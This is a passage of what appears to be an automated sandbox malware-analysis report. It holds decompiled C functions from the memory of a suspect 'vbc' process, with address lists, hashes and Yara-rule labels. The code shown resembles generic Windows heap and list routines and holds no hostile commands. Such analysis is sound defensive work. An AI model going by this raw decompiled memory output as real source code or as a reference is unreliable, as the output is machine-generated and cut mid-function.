								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x16a5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E015CFFB0(_t51, _t64, 0x16a8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E015FB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                  0x01663d40
                                                  0x01663d48
                                                  0x01663d52
                                                  0x01663d59
                                                  0x01663d5d
                                                  0x01663d61
                                                  0x01663d63
                                                  0x01663d67
                                                  0x01663d69
                                                  0x01663d72
                                                  0x01663d76
                                                  0x01663d7a
                                                  0x01663d7f
                                                  0x01663d8b
                                                  0x01663d91
                                                  0x01663d91
                                                  0x01663d91
                                                  0x01663d94
                                                  0x01663d96
                                                  0x01663d9d
                                                  0x01663da1
                                                  0x01663db0
                                                  0x01663dba
                                                  0x01663dbc
                                                  0x01663dbc
                                                  0x01663dc6
                                                  0x01663dcb
                                                  0x01663dcf
                                                  0x01663dd1
                                                  0x01663dd4
                                                  0x00000000
                                                  0x00000000
                                                  0x01663dd9
                                                  0x01663e0c
                                                  0x01663e0c
                                                  0x01663e0f
                                                  0x01663ddb
                                                  0x01663ddb
                                                  0x01663de0
                                                  0x00000000
                                                  0x01663de2
                                                  0x01663de2
                                                  0x01663de4
                                                  0x01663de8
                                                  0x01663deb
                                                  0x01663df1
                                                  0x00000000
                                                  0x01663df3
                                                  0x01663df3
                                                  0x01663df5
                                                  0x01663df8
                                                  0x01663dfa
                                                  0x00000000
                                                  0x01663dfa
                                                  0x01663df1
                                                  0x01663de0
                                                  0x01663e11
                                                  0x01663e11
                                                  0x00000000
                                                  0x01663dfe
                                                  0x01663e04
                                                  0x01663e06
                                                  0x00000000
                                                  0x01663e06
                                                  0x00000000
                                                  0x01663e04
                                                  0x01663d91
                                                  0x01663e15
                                                  0x01663e1a
                                                  0x01663e1f
                                                  0x01663e1f
                                                  0x01663e23
                                                  0x01663e29
                                                  0x00000000
                                                  0x00000000
                                                  0x01663e2e
                                                  0x00000000
                                                  0x01663e30
                                                  0x01663e30
                                                  0x01663e35
                                                  0x00000000
                                                  0x01663e37
                                                  0x01663e3e
                                                  0x01663e42
                                                  0x01663e48
                                                  0x01663e4e
                                                  0x00000000
                                                  0x01663e4e
                                                  0x01663e35
                                                  0x00000000
                                                  0x01663e2e
                                                  0x01663e5b
                                                  0x01663e5c
                                                  0x01663e5d
                                                  0x01663e68
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9017631341207e481ac446a83af7df4b5b5089be23e61fcea17a38a649a7bccc
                                                  • Instruction ID: d404b26eea23d4fedcdc99ca6331f2c84cdc5d74fa0fb8bb237a5cbaaa59c685
                                                  • Opcode Fuzzy Hash: 9017631341207e481ac446a83af7df4b5b5089be23e61fcea17a38a649a7bccc
                                                  • Instruction Fuzzy Hash: BE314371A09302DFC720DF18CD8082ABBE9FB85604F44496EE8999B341D730ED15CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EA70E Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E015EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x16a7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x16a7b10 = 8;
					 *0x16a7b14 = 0x16a7b0c;
					 *0x16a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E015EA990(0x16a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L015EA840(__edx, __ecx, __ecx, _t52, 0x16a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x16a7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x16a7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x16a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L015D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x16a7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E015FF3E0(_t50,  *0x16a7b14, _t8 >> 3);
						_t28 =  *0x16a7b14; // 0x0
						__eflags = _t28 - 0x16a7b0c;
						if(_t28 != 0x16a7b0c) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x16a7b14 = _t50;
						_t48 = _v12;
						 *0x16a7b10 = _t9;
						goto L6;
					}
					 *0x16a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                  0x015ea713
                                                  0x015ea714
                                                  0x015ea717
                                                  0x015ea71d
                                                  0x015ea720
                                                  0x015ea722
                                                  0x015ea727
                                                  0x015ea74a
                                                  0x015ea754
                                                  0x015ea75e
                                                  0x015ea768
                                                  0x015ea76a
                                                  0x015ea773
                                                  0x015ea78b
                                                  0x015ea790
                                                  0x015ea792
                                                  0x015ea741
                                                  0x015ea741
                                                  0x015ea743
                                                  0x015ea749
                                                  0x015ea749
                                                  0x015ea732
                                                  0x015ea73a
                                                  0x015ea797
                                                  0x015ea79d
                                                  0x015ea7a3
                                                  0x015ea7a9
                                                  0x015ea7b6
                                                  0x015ea7bc
                                                  0x015ea7ca
                                                  0x015ea7e0
                                                  0x015ea7e2
                                                  0x015ea7e4
                                                  0x01629bf2
                                                  0x00000000
                                                  0x01629bf2
                                                  0x015ea7ed
                                                  0x015ea7f2
                                                  0x015ea800
                                                  0x015ea805
                                                  0x015ea80d
                                                  0x015ea812
                                                  0x01629c08
                                                  0x01629c08
                                                  0x015ea818
                                                  0x015ea81b
                                                  0x015ea821
                                                  0x015ea824
                                                  0x00000000
                                                  0x015ea824
                                                  0x015ea7ae
                                                  0x00000000
                                                  0x015ea7ae
                                                  0x015ea73c
                                                  0x015ea73e
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7897e88fa0066656afc5a5d26391e88f440bc35cd91a323c224dd7a57ba7f864
                                                  • Instruction ID: 36df3f2dd2c24f2dac952cbca6b54d40516b64a0a4091e76c16e3e380dcfe90e
                                                  • Opcode Fuzzy Hash: 7897e88fa0066656afc5a5d26391e88f440bc35cd91a323c224dd7a57ba7f864
                                                  • Instruction Fuzzy Hash: CB31BEF1A402019FD725CF28DC84F6ABBF9FB94710F95095AE2068B244D772A911CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E61A0 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E015E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E015E5E50(0x15967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01689D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E015BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                  0x015e61b3
                                                  0x015e61b5
                                                  0x015e61bd
                                                  0x015e61c3
                                                  0x015e61c7
                                                  0x015e61d2
                                                  0x015e61ff
                                                  0x015e61ff
                                                  0x015e6201
                                                  0x015e6207
                                                  0x015e6207
                                                  0x015e61d4
                                                  0x015e61d9
                                                  0x00000000
                                                  0x00000000
                                                  0x015e61df
                                                  0x015e61e2
                                                  0x00000000
                                                  0x00000000
                                                  0x015e61e6
                                                  0x015e61e8
                                                  0x015e61ee
                                                  0x015e61ee
                                                  0x015e61f9
                                                  0x0162762f
                                                  0x01627632
                                                  0x01627635
                                                  0x01627639
                                                  0x01627640
                                                  0x0162766e
                                                  0x01627675
                                                  0x00000000
                                                  0x00000000
                                                  0x01627681
                                                  0x01627689
                                                  0x0162768d
                                                  0x01627691
                                                  0x01627695
                                                  0x01627699
                                                  0x016276af
                                                  0x016276b5
                                                  0x016276b7
                                                  0x016276b7
                                                  0x016276d7
                                                  0x016276dc
                                                  0x00000000
                                                  0x016276dc
                                                  0x016276a2
                                                  0x016276a9
                                                  0x01627651
                                                  0x01627653
                                                  0x01627653
                                                  0x01627656
                                                  0x01627656
                                                  0x00000000
                                                  0x01627656
                                                  0x01627644
                                                  0x01627646
                                                  0x01627648
                                                  0x01627648
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7722b10c23c855bfba04c7e2c96139e4305d08bc0e06b3462aaf79e7e779ab9
                                                  • Instruction ID: 3b1e7939a75c8fe4364063b309fb9cf4c0dbf1191327212d8fb78872c222f71b
                                                  • Opcode Fuzzy Hash: d7722b10c23c855bfba04c7e2c96139e4305d08bc0e06b3462aaf79e7e779ab9
                                                  • Instruction Fuzzy Hash: DF316B71A057228FE364CF1DC844B2ABBE5FFA8B00F05496DE9989B351E770E804CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BAA16 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E015BAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x16ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x16a7b9c; // 0x0
					_t53 = L015D4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E015FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E015FF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L015C6C59(_t53, _t51, _t58) != 0) {
							_t28 = E015E5E50(0x159c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E015EB230(_v32, _v28, 0x159c2d8, 1,  &_v24);
								_t28 = E015BF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                  0x015baa25
                                                  0x015baa29
                                                  0x015baa2d
                                                  0x015baa30
                                                  0x015baa37
                                                  0x015baa3c
                                                  0x01614458
                                                  0x01614458
                                                  0x01614472
                                                  0x01614474
                                                  0x01614476
                                                  0x015baa64
                                                  0x015baa74
                                                  0x0161447c
                                                  0x01614483
                                                  0x01614492
                                                  0x015baa52
                                                  0x015baa54
                                                  0x015baa5e
                                                  0x016144a8
                                                  0x016144ad
                                                  0x016144af
                                                  0x016144b6
                                                  0x016144b6
                                                  0x016144b9
                                                  0x016144bc
                                                  0x016144cd
                                                  0x016144d3
                                                  0x016144d6
                                                  0x016144e1
                                                  0x016144e1
                                                  0x016144e6
                                                  0x016144e8
                                                  0x016144fb
                                                  0x016144fb
                                                  0x016144e8
                                                  0x00000000
                                                  0x015baa5e
                                                  0x01614476
                                                  0x015baa42
                                                  0x015baa46
                                                  0x015baa48
                                                  0x015baa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd236d19d46027c95ecb7e4e6f8d31deb5eef1198ff322bdfec11a0c402062ec
                                                  • Instruction ID: 22359d04e162d4ad29ad1218b6fdbcbb4eff7607f2f6f860d654a0f84fe8970d
                                                  • Opcode Fuzzy Hash: bd236d19d46027c95ecb7e4e6f8d31deb5eef1198ff322bdfec11a0c402062ec
                                                  • Instruction Fuzzy Hash: 2C31C372A0021AABDF159F68CD81ABFB7B8FF44700B45446AF901EF240EB759911DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F4A2C Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E015F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x16ad360 ^ _t62;
				_v8 =  *0x16ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E015D2280(_t26, 0x16a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E015CFFB0(_t41, _t51, 0x16a8608);
						L2:
						 *0x16ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E015FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E015D2280(_t28, 0x16a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E015CFFB0(_t42, _t53, 0x16a8608);
							if(_t53 != 0) {
								L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E015CFFB0(_t41, _t51, 0x16a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                  0x015f4a2c
                                                  0x015f4a34
                                                  0x015f4a3c
                                                  0x015f4a3e
                                                  0x015f4a48
                                                  0x015f4a4b
                                                  0x015f4a4d
                                                  0x015f4a51
                                                  0x015f4a9c
                                                  0x00000000
                                                  0x00000000
                                                  0x015f4aa3
                                                  0x015f4aa8
                                                  0x015f4aad
                                                  0x015f4ab1
                                                  0x015f4ade
                                                  0x015f4ae3
                                                  0x015f4a5a
                                                  0x015f4a62
                                                  0x015f4a6a
                                                  0x015f4a6e
                                                  0x0162f203
                                                  0x015f4a84
                                                  0x015f4a88
                                                  0x015f4a89
                                                  0x015f4a8a
                                                  0x015f4a95
                                                  0x015f4a95
                                                  0x015f4a79
                                                  0x015f4a80
                                                  0x015f4af2
                                                  0x015f4af4
                                                  0x015f4af9
                                                  0x015f4aff
                                                  0x015f4b01
                                                  0x015f4b03
                                                  0x015f4b08
                                                  0x0162f20a
                                                  0x0162f212
                                                  0x0162f216
                                                  0x0162f216
                                                  0x015f4b08
                                                  0x015f4b13
                                                  0x015f4b1a
                                                  0x0162f229
                                                  0x0162f229
                                                  0x015f4b1a
                                                  0x015f4a82
                                                  0x00000000
                                                  0x015f4a82
                                                  0x015f4ab7
                                                  0x015f4acd
                                                  0x015f4acd
                                                  0x015f4ad5
                                                  0x015f4ada
                                                  0x00000000
                                                  0x015f4ada
                                                  0x015f4ac2
                                                  0x015f4acb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015f4acb
                                                  0x015f4a53
                                                  0x015f4a53
                                                  0x015f4a58
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1e91126e4d46536e8ed76f8b9c635fd47fd73717a7de83b7ec0a0c9a8c61cd0
                                                  • Instruction ID: 22b6b244cfdab4c87c55994ca53198fe6a6760b8599dc4b8678f58479e3027c1
                                                  • Opcode Fuzzy Hash: a1e91126e4d46536e8ed76f8b9c635fd47fd73717a7de83b7ec0a0c9a8c61cd0
                                                  • Instruction Fuzzy Hash: 1331E4322056529BD7219F58CD44B2BBBE6FFC5B10F44455DE6964F641C7B0E804CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F8EC7 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E015F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x16ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E015E4E70(0x16a86e4, 0x15f9490, 0, 0);
					if( *0x16a53e8 > 5 && E015F8F33(0x16a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x16a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x16a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x159bc46;
						_t48 = E01637B9C(0x16a53e8, 0x159bc46, _t67, 0x16a53e8, _t70,  &_v140);
					}
				}
				return E015FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                  0x015f8ec7
                                                  0x015f8ed9
                                                  0x015f8edc
                                                  0x015f8ee6
                                                  0x015f8ee9
                                                  0x015f8eee
                                                  0x015f8efc
                                                  0x015f8f08
                                                  0x01631349
                                                  0x01631353
                                                  0x0163135d
                                                  0x01631366
                                                  0x0163136f
                                                  0x01631375
                                                  0x0163137c
                                                  0x01631385
                                                  0x01631390
                                                  0x01631391
                                                  0x0163139c
                                                  0x0163139d
                                                  0x016313a6
                                                  0x016313ac
                                                  0x016313b2
                                                  0x016313b5
                                                  0x016313bc
                                                  0x016313bf
                                                  0x016313c2
                                                  0x016313c5
                                                  0x016313c8
                                                  0x016313cb
                                                  0x016313ce
                                                  0x016313d1
                                                  0x016313d4
                                                  0x016313d7
                                                  0x016313da
                                                  0x016313dd
                                                  0x016313e0
                                                  0x016313e3
                                                  0x016313e6
                                                  0x016313e9
                                                  0x016313f6
                                                  0x01631400
                                                  0x01631400
                                                  0x015f8f08
                                                  0x015f8f32

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec82222b4572e237945790387346140d3d1a2f7f1262e4f33314f86a8ac3f468
                                                  • Instruction ID: 8a70344c8651686d89c3041141a44aa2ed7b915a83236702cd48f41f89ccc2f8
                                                  • Opcode Fuzzy Hash: ec82222b4572e237945790387346140d3d1a2f7f1262e4f33314f86a8ac3f468
                                                  • Instruction Fuzzy Hash: 0841A1B1D002199FDB24CFAAD980AAEFBF4FB49310F5041AEE619A7200E7705A44CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EE730 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E015EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E015F9670() < 0) {
					L0160DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x16a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L015D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M015EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                  0x015ee730
                                                  0x015ee736
                                                  0x015ee738
                                                  0x015ee73d
                                                  0x015ee73e
                                                  0x015ee740
                                                  0x015ee749
                                                  0x015ee765
                                                  0x015ee76a
                                                  0x015ee76b
                                                  0x015ee76c
                                                  0x015ee76d
                                                  0x015ee76e
                                                  0x015ee76f
                                                  0x015ee775
                                                  0x015ee777
                                                  0x015ee77e
                                                  0x0162b675
                                                  0x015ee784
                                                  0x015ee784
                                                  0x015ee789
                                                  0x015ee7a8
                                                  0x015ee7ac
